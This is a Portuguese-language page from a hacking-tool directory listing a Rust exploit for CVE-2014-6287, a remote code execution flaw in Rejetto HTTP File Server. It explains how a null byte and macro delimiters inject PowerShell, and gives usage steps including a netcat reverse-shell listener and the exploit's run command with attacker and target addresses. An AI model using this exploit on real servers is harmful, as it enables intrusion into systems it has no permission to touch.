Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2014-6287 — Uma implementação em Rust do exploit CVE-2014-6287 direcionado às versões 2.3x anteriores à 2.3c do Rejetto HTTP File Server (HFS). | Kitploit
Ferramentas/GitHubGitHub/nika0x38/cve-2014-6287
Geração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubnika0x38/cve-2014-6287

CVE-2014-6287

Uma implementação em Rust do exploit CVE-2014-6287 direcionado às versões 2.3x anteriores à 2.3c do Rejetto HTTP File Server (HFS).

Ver Repositório
1há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2014-6287 - Exploração de RCE no Rejetto HTTP File Server

Rust Security

Uma implementação em Rust da exploração da CVE-2014-6287 voltada para o Rejetto HTTP File Server (HFS) versões 2.3x anteriores à 2.3c.

Visão Geral da Vulnerabilidade

CVE-2014-6287 é uma vulnerabilidade crítica de execução remota de código no Rejetto HTTP File Server (HFS).

Detalhes Técnicos

  • Software Afetado: Rejetto HTTP File Server (HFS) 2.3x anterior à 2.3c
  • Tipo de Vulnerabilidade: Execução Remota de Código (RCE)
  • Pontuação CVSS: 10.0 (Crítica)
  • CWE: CWE-94 (Controle inadequado da geração de código)

Descrição

A função findMacroMarker em no Rejetto HTTP File Server permite que atacantes remotos executem programas arbitrários por meio de uma sequência em uma ação de pesquisa. Essa vulnerabilidade possibilita que atacantes contornem a validação de entrada e injetem código malicioso que é executado no sistema alvo.

parserLib.pas
%00

A exploração funciona da seguinte forma:

  1. Cria uma consulta de pesquisa maliciosa contendo um byte nulo (%00)
  2. Injeta comandos PowerShell dentro dos delimitadores de macro {. e .}
  3. O servidor processa a macro e executa o código PowerShell incorporado
  4. Estabelece uma conexão reversa de shell de volta ao atacante

Uso

Passo 1: Configurar um Listener Netcat

Antes de executar a exploração, configure um listener na sua máquina atacante para capturar o shell reverso:

root@kitploit:~
# Substitua <LPORT> pela porta de escuta desejada
nc -lvnp <LPORT>

Passo 2: Executar a Exploração

root@kitploit:~
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]

Parâmetros Obrigatórios:

  • -l, --lhost <LHOST>: Seu endereço IP local (máquina atacante)
  • -p, --lport <LPORT>: Sua porta local para o shell reverso
  • -r, --rhost <RHOST>: Endereço IP do alvo (servidor HFS vulnerável)

Parâmetros Opcionais:

  • -t, --rport <RPORT>: Porta do alvo (padrão: 80)

Aviso Legal

Esta ferramenta destina-se apenas a fins educacionais e de testes de penetração autorizados. Use com responsabilidade e somente em sistemas que você possui ou para os quais tenha permissão explícita.

Baixar ferramenta